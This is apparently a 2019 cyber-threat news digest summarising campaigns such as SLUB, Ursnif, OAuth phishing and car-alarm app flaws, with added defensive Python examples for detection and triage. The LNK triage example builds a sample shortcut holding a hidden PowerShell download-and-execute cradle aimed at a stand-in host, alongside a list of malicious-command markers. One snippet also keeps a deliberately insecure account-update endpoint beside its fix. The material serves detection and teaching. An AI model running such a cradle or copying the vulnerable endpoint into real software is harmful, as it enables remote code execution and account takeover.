Silobreaker Daily Cyber Digest – 8 March 2019
New SLUB backdoor uses Slack and GitHub as communication channels
- A new backdoor, dubbed SLUB, has been detected in the wild as part of a multi-stage infection process targeting victims with watering hole attacks. The backdoor uses ‘statically-linked curl, boost, and JsonCpp libraries for performing HTTP requests, extracting commands from gist snippets, and parsing Slack channel communication’.
- The infection chain starts with an exploit for CVE-2018-8174, a remote code execution vulnerability in the Windows VBScript engine, which the operators use to drop and launch a downloader posing as a DLL file via PowerShell. The SLUB backdoor itself is downloaded in the second stage, and CVE-2015-1701, a privilege escalation flaw in Windows kernel-mode drivers, is exploited to gain elevated privileges.
- The campaign attempted to collect data from victims and exfiltrate it through Slack, within a specific workspace. SLUB achieves persistence by adding a Run key to the Windows registry and retrieves its commands from a GitHub Gist snippet. The Slack and GitHub accounts have since been disabled.
Ursnif resurges using new techniques to evade detection
- Bromium researchers detected a resurgence of the Ursnif credential-stealing trojan in February.
- Ursnif was delivered via phishing emails carrying a password-protected zip attachment containing a Microsoft Word dropper with a VBA AutoOpen macro. Once the document is opened and macros are enabled, the macro downloads the Ursnif executable from a remote server.
- Apart from using password-protected zip files, which content-scanning gateways cannot inspect, to avoid detection, the malware was also seen using a COM technique to launch its next stage in a way that sidesteps detections keyed on parent-child process relationships (for example, Word spawning a script interpreter).
Source (Includes IOCs)
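The parent-child relationship the COM technique plays on is the one most macro-dropper detections key on: an Office process directly spawning a script host. The following is an added example, not code from Bromium's write-up; the process-creation events are constructed, and it assumes the COM-launched stage surfaces under a parent outside the Word process tree, which is what a technique that exploits parent-child process relationships implies. It shows a direct-parent rule, an ancestor rule that also catches a cmd.exe intermediary, and the COM case that neither rule sees.

```python
from typing import Dict, Iterator, List, Optional, Set

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed Sysmon-style process-creation events (pid, parent pid, image); not real telemetry.
EVENTS: List[dict] = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe"},
    {"pid": 2100, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    # classic macro: Word spawns PowerShell directly
    {"pid": 2200, "ppid": 2100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # laundered through cmd.exe: still a descendant of Word
    {"pid": 2300, "ppid": 2100, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 2301, "ppid": 2300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    # COM-activated (assumed): the launching process is not in Word's tree at all
    {"pid": 2400, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def index_by_pid(events: List[dict]) -> Dict[int, dict]:
    return {e["pid"]: e for e in events}


def ancestors(pid: int, procs: Dict[int, dict]) -> Iterator[str]:
    """Yield ancestor image names by walking ppid links; stops at an unknown pid or a cycle."""
    seen: Set[int] = set()
    cur = procs.get(pid)
    while cur is not None and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        parent = procs.get(cur["ppid"])
        if parent is None:
            return
        yield basename(parent["image"])
        cur = parent


def office_spawns_script_host(events: List[dict], max_depth: Optional[int] = 1) -> Set[int]:
    """Pids of script hosts with an Office app among their ancestors within max_depth (None = unlimited)."""
    procs = index_by_pid(events)
    hits: Set[int] = set()
    for e in events:
        if basename(e["image"]) not in SCRIPT_HOSTS:
            continue
        for depth, ancestor in enumerate(ancestors(e["pid"], procs), start=1):
            if max_depth is not None and depth > max_depth:
                break
            if ancestor in OFFICE_APPS:
                hits.add(e["pid"])
                break
    return hits


if __name__ == "__main__":
    print("direct parent rule:", sorted(office_spawns_script_host(EVENTS, max_depth=1)))
    print("any ancestor rule: ", sorted(office_spawns_script_host(EVENTS, max_depth=None)))
```

The direct rule flags pids 2200 and 2300, the ancestor rule adds 2301, and pid 2400 is flagged by neither: by lineage alone it is indistinguishable from a user opening PowerShell themselves, so the evasion has to be caught elsewhere, for instance by correlating with the document-open event or by inspecting the command line of script hosts that appear under explorer.exe.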
Hackers use Termite and Earthworm testing tools to create multi-platform botnet
- Termite and Earthworm are packet relay tools developed by Chinese security firm 360Netlab. According to a new report by AT&T Cybersecurity, attackers have weaponized these tools to create a botnet of IoT devices.
- Termite can function as a SOCKS proxy to bounce traffic, as well as a lightweight backdoor to upload and download files, and execute shell commands.
- AT&T discovered Earthworm embedded in an image file inside an Android app that communicates with a server in Taiwan previously known to host Xsser malware and associated with BlackTech. In another instance, Earthworm was found packaged with cryptomining malware.
Source (Includes IOCs)
FTC issue warning on increase of Social Security scams
- Scammers have been observed pretending to be employees of the Social Security Administration (SSA), causing losses of $16.6 million in 2018. According to the US Federal Trade Commission, some 63,000 reports of this type of fraud have been received since January 2018.
- The scammers use this method to get victims to send money through unconventional methods or to obtain information that could be used for identity fraud. The scammers spoof the number of the SSA to appear legitimate and state that the call was prompted by suspicions of crime-related activities, before asking for sensitive details to unblock the victim’s account.
Cybercriminal accidentally attaches legitimate PowerShell instead of malware
- A phishing email has been observed, posing as an invoice that asks for confirmation of a company account, whose attachment was the legitimate Windows powershell.exe binary rather than a malicious payload. As all major email services block executable attachments, the file was blocked anyway.
- It is believed that the actor behind the email intended to attach a LNK shortcut file, a common delivery vehicle for malicious payloads. The shortcut file included PowerShell commands and scripts to run on the victim’s machine.
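A quick way to triage such a shortcut before anyone double-clicks it is to parse its StringData and read out the command line it would run. The script below is an added example, not code from the report: it parses the Shell Link format as documented in MS-SHLLINK (header, optional IDList and LinkInfo skipped, then the StringData fields in their fixed order), decodes a -EncodedCommand payload, and flags common malicious-shortcut patterns. The sample .lnk bytes are constructed inline by build_sample_lnk, and the download cradle URL and file names in them are hypothetical.

```python
import base64
import re
import struct
from typing import Dict, Optional

# Constants from MS-SHLLINK. LinkCLSID is 00021401-0000-0000-C000-000000000046.
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData structures appear in this order, each present only if its flag is set.
STRING_DATA_ORDER = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                     ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                     ("icon_location", HAS_ICON_LOCATION)]
LAUNCHERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
             "cscript.exe", "rundll32.exe", "regsvr32.exe"}
MARKERS = ("-w hidden", "-windowstyle hidden", "-nop", "-noprofile", "-enc",
           "downloadstring", "iex", "invoke-expression", "frombase64string")


def parse_lnk(data: bytes) -> Dict[str, str]:
    """Return the StringData fields of a .lnk file (target resolution via IDList/LinkInfo is omitted)."""
    if (len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (4 bytes) counts itself
        off += struct.unpack_from("<I", data, off)[0]
    fields: Dict[str, str] = {}
    width = 2 if flags & IS_UNICODE else 1
    for name, bit in STRING_DATA_ORDER:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters; no terminator follows
        off += 2
        raw = data[off:off + count * width]
        if len(raw) != count * width:
            raise ValueError(f"truncated {name} string")
        off += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return fields


def decode_encoded_command(arguments: str) -> Optional[str]:
    """Decode the base64 UTF-16LE script behind -EncodedCommand (any prefix -e, -en, -enc, ... or -ec)."""
    for m in re.finditer(r"(?:^|\s)-([A-Za-z]+)\s+([A-Za-z0-9+/=]+)", arguments):
        switch = m.group(1).lower()
        if switch == "ec" or (switch.startswith("e") and "encodedcommand".startswith(switch)):
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage(data: bytes) -> dict:
    """Summarise what the shortcut would run and flag common malicious-LNK patterns."""
    fields = parse_lnk(data)
    target = fields.get("relative_path", "")
    args = fields.get("arguments", "")
    decoded = decode_encoded_command(args)
    launcher = target.lower().rsplit("\\", 1)[-1]
    haystack = (args + " " + (decoded or "")).lower()
    return {"target": target, "arguments": args, "decoded_command": decoded,
            "suspicious": launcher in LAUNCHERS and any(mk in haystack for mk in MARKERS)}


def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed fixture: minimal Unicode .lnk with a dummy IDList, RELATIVE_PATH and COMMAND_LINE_ARGUMENTS."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
    header += bytes(HEADER_SIZE - len(header))       # attributes, timestamps, size, icon, show, hotkey, reserved
    id_list = b"\x04\x00\xaa\xbb" + b"\x00\x00"       # one 4-byte ItemID followed by TerminalID
    id_list = struct.pack("<H", len(id_list)) + id_list

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + id_list + string_data(relative_path) + string_data(arguments)


# Constructed sample: a shortcut that launches hidden PowerShell with an encoded download cradle (hypothetical URL).
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoP -W Hidden -Enc " + base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii"),
)

if __name__ == "__main__":
    print(triage(SAMPLE_LNK))
```

Real-world shortcuts usually carry the target in the IDList or LinkInfo rather than RELATIVE_PATH, so a production tool should resolve those as well; the StringData parse above is enough to surface the arguments, which is where the PowerShell cradle lives.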
Egyptian government uses third-party applications against activists
- Amnesty International claimed that the Egyptian government is responsible for a recent wave of spear-phishing attacks aimed at prominent local human rights defenders, the media and civil society organizations’ staff.
- The attacks used a spear-phishing technique, dubbed OAuth phishing, that steals an OAuth grant for the user’s account instead of the account password. Victims received emails disguised as legitimate Gmail security alerts containing a link to a page where a third-party app requests access to their account. Once access is granted, the user is redirected to the legitimate security settings page where they can change their password; because the attacker holds an OAuth grant rather than the password, that change does not end their access, which persists until the app’s permission is revoked in the account’s third-party access settings.
- The campaign was also aimed at other email services including Yahoo, Outlook and Hotmail.
GandCrab creators change tactics
- Pinchy Spider, the gang behind GandCrab ransomware, is shifting its tactics, partly to counter decryption efforts against its trademark ransomware. It is recruiting new members to broaden its skillset and is spending its time deploying the malware against lucrative targets rather than anyone and everyone, in order to maximise returns. Sophos researchers state that this is occurring alongside the group’s ransomware-as-a-service business.
- Pinchy Spider’s recruitment drive on dark web forums seeks operators with Remote Desktop Protocol (RDP), Virtual Network Computing (VNC) and corporate spamming expertise. CrowdStrike describes the approach as ‘Big Game Hunting’, a tactic that is not new but to which Pinchy Spider has added its own ‘spin’: individual hosts in a network are encrypted, each with a different key, and payment is demanded on a host-by-host basis.
Extortion spam campaign leveraging QR code
- Trustwave researchers have observed a new sextortion campaign that embeds a QR code linking to a Bitcoin payment URL through which victims are meant to pay the extortionist. The email itself contains nothing new: it claims that the recipient’s activity, including webcam footage, has been recorded and gives them 48 hours to pay.
Leaks and Breaches
Columbia Surgical Specialists pay ransom following ransomware attack
- The surgical centre in Spokane, Washington, suffered a ransomware attack that impacted up to 400,000 patients. Patients’ names, drivers’ licenses, Social Security numbers and other protected health information may have been compromised.
- The centre confirmed that it paid $14,650 in ransom because several affected patients were scheduled for surgery and medical staff needed access to their records.
Security flaws discovered in three specialist car alarm apps
- According to research by Pen Test Partners, vulnerabilities exist in car alarm apps by Clifford, Viper and Pandora. Exploiting these flaws lets attackers activate car alarms, unlock a vehicle’s doors or start its engine through the insecure app.
- In particular, a password flaw in the Pandora app allowed the researchers to take control of the smart alarm’s remote access app, track any vehicle in real time, remotely activate the alarm, open the door locks and start the engine. Using only a legitimate account, they could also access other users’ profiles and change those users’ passwords to gain full control of their accounts.
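The last point is a textbook missing object-level authorization check (often called IDOR): the API verified that the caller was logged in, but not that the account being modified was theirs. The following is an added illustration, not the vendor’s code, with a constructed in-memory user store and session table; update_user_vulnerable reproduces that mistake and update_user_fixed shows the check that closes it.

```python
import hashlib
import secrets
from typing import Dict, Optional


class Forbidden(Exception):
    """Raised when a request fails authentication or authorization."""


def hash_password(password: str) -> str:
    """PBKDF2-SHA256 with a random salt; adequate for the demo, use a dedicated library in production."""
    salt = secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + ":" + digest.hex()


# Constructed in-memory state standing in for the vendor's user and session tables.
USERS: Dict[int, dict] = {
    1: {"email": "attacker@example.invalid", "password": hash_password("attacker-pw"), "vehicle": "VIN-AAA"},
    2: {"email": "victim@example.invalid", "password": hash_password("victim-pw"), "vehicle": "VIN-BBB"},
}
SESSIONS: Dict[str, int] = {}   # bearer token -> user id


def login(user_id: int) -> str:
    """Issue an opaque bearer token for an already-verified user (credential check omitted here)."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = user_id
    return token


def _apply(user: dict, email: Optional[str], password: Optional[str]) -> dict:
    if email:
        user["email"] = email
    if password:
        user["password"] = hash_password(password)
    return user


def update_user_vulnerable(token: str, user_id: int, email: Optional[str] = None,
                           password: Optional[str] = None) -> dict:
    """Authenticates the caller but trusts the user_id in the request: any logged-in user can rewrite any account."""
    if token not in SESSIONS:
        raise Forbidden("authentication required")
    return _apply(USERS[user_id], email, password)


def update_user_fixed(token: str, user_id: int, email: Optional[str] = None,
                      password: Optional[str] = None) -> dict:
    """Same endpoint with object-level authorization: the record must belong to the session's user."""
    caller = SESSIONS.get(token)
    if caller is None:
        raise Forbidden("authentication required")
    if caller != user_id:   # ownership is decided server-side, never from the client-supplied id alone
        raise Forbidden("account does not belong to caller")
    return _apply(USERS[user_id], email, password)


if __name__ == "__main__":
    attacker = login(1)
    print(update_user_vulnerable(attacker, 2, email="attacker@example.invalid")["email"])
    try:
        update_user_fixed(attacker, 2, email="attacker@example.invalid")
    except Forbidden as exc:
        print("fixed endpoint refused:", exc)
```

Changing the victim’s email here is the whole attack: once the account’s contact address belongs to the attacker, a normal password reset hands them the account, and with it the vehicle. A stricter design drops the user_id parameter from self-service endpoints altogether and always operates on the session’s own user.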
Vulnerabilities discovered in Pixar Renderman
- Researchers at Cisco Talos discovered three local vulnerabilities in the macOS version of Pixar Renderman’s install helper tool. An attacker could exploit these vulnerabilities to gain root privileges on a target system.
- The three vulnerabilities are identified as CVE-2018-4054, an install helper privilege escalation vulnerability, CVE-2018-4055, an arbitrary file read privilege escalation vulnerability, and CVE-2019-5015, a privilege escalation vulnerability.
- Pixar Renderman 22.3.0 and prior are affected by these vulnerabilities, and a patch is now available.
Medical IoT devices vulnerable to hacking
- Check Point has reported that medical IoT devices contain vulnerabilities because they are often built on legacy operating systems and outdated software. Statistics show that 87% of healthcare organisations will have adopted IoT devices by the end of 2019, and the researchers believe that outdated, unpatched devices will only widen the attack surface available to malicious actors.
- In their research, they obtained an ultrasound machine that turned out to still be running Windows 2000, an operating system with publicly known vulnerabilities that Microsoft no longer maintains or supports. They were able to exploit one of the many known vulnerabilities with little effort and access the machine’s entire database.
Vulnerabilities patched in Cisco Nexus switches
- Cisco published a batch of security advisories covering vulnerabilities in Cisco Nexus switches, including CVE-2019-1618, an arbitrary code execution vulnerability rated high. Separately listed were CVE-2019-1663, a critical remote command execution vulnerability that affects the web management interface of Cisco RV110W, RV130W and RV215W routers rather than Nexus switches, and CVE-2018-0296, a denial of service vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) software.
Facebook removes campaigns used to promote discord in UK and Romania
- Facebook has discovered and removed content that was related to two coordinated campaigns dedicated to creating political discord in the UK and Romania. One of the campaigns impersonated activists that represented the far right and the anti-far right to spread misinformation, hate speech and divisive comments on both sides of the UK’s political spectrum.
- In total 137 Facebook and Instagram accounts, pages and groups were removed, including 23 Facebook pages, 74 Facebook accounts, 5 Facebook groups and 35 Instagram accounts with over 180,000 followers. The campaign also spent $1,500 on advertisements since 2013.
- A similar campaign was also identified based out of Romania, with the purpose of using a combination of fake and authentic accounts to create posts in support of the Social Democratic Party (PSD). This campaign consisted of 4 Facebook pages, 26 Facebook accounts and one Facebook group, and spent approximately $650 on advertising since 2013.
Researchers analyse MuddyWater’s PowerShell backdoor
- Threat Recon Team researchers described how MuddyWater uses a PowerShell-to-EXE technique to carry out its attacks and load scripts through layers of obfuscation. In the blog post, the researchers detailed a recent version of the backdoor, including how it creates a ‘victim ID’ and its C&C structure.
Source (Includes IOCs)
Minnesota man pleads guilty to hacking Minnesota government databases
- 20-year-old Cameron Thomas Crowley has admitted to hacking state government databases in 2017, in response to the acquittal of an officer who fatally shot Philando Castile during a 2016 traffic stop. Losses caused by Crowley’s hacking operations reportedly total between $40,000 and $90,000.
- Crowley used the pseudonym ‘Vigilance’ as he attacked government databases, including one that contained identifying information pertaining to hundreds of students and employees at a university. Crowley then posted a link to that information on a well-known hacking website.
- In addition, he also hacked into other databases owned by the Minnesota government, a second university and an unnamed school district.
The Silobreaker Team
Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.